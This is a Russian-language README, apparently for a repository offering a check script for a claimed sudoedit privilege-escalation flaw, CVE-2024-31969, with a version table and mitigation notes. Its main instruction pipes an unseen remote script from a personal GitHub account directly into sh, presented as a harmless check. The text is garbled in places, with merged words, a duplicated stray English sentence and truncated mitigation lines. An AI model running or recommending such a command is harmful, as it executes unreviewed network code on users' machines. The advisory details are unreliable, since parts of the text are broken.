
Предоставляет proof-of-concept проверочный скрипт и документацию для CVE-2024-31969 — локального повышения привилегий в sudoedit из состава sudo, включая затронутые версии и рекомендации по смягчению последствий.
CVE-2024-31969 — это уязвимость локального повышения привилегий в sudo при использовании команды sudoedit.
Эта уязвимость была внедрена начиная с sudo 1.9.0 из-за недостаточно корректной проверки переменных окружения пользователя и прав владения файлами в sudoedit.
A flaw introduced in sudo 1.9.0 in how
sudoeditvalidated users' environment variables and file ownership.
Эта уязвимость позволяет локальному пользователю с доступом к sudoedit изменять произвольные файлы от имени root посредством манипуляции переменными окружения, такими как SUDO_EDITOR, или с помощью использования символьных ссылок.
| Версия Sudo | Статус |
|---|---|
| 1.9.0 → 1.9.15p4 | 🔥 Уязвима |
| 1.9.15p5 и выше | ✅ Безопасна |
| 1.8.x (включая 1.8.23) | ❌ Не затронута |
Выполните следующую команду:
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh
sudo до версии 1.9.15p5 или новее.sudoers, разрешающие sudoedit для пользователей, не являющихся root.env_keep или env_reset в файле /etc/sudoers.Этот репозиторий создан в образовательных целях и для документирования безопасности систем.
Категорически запрещается использовать эту информацию для незаконной деятельности или без письменного разрешения владельца системы.
Любое злоупотребление полностью находится вне ответственности автора.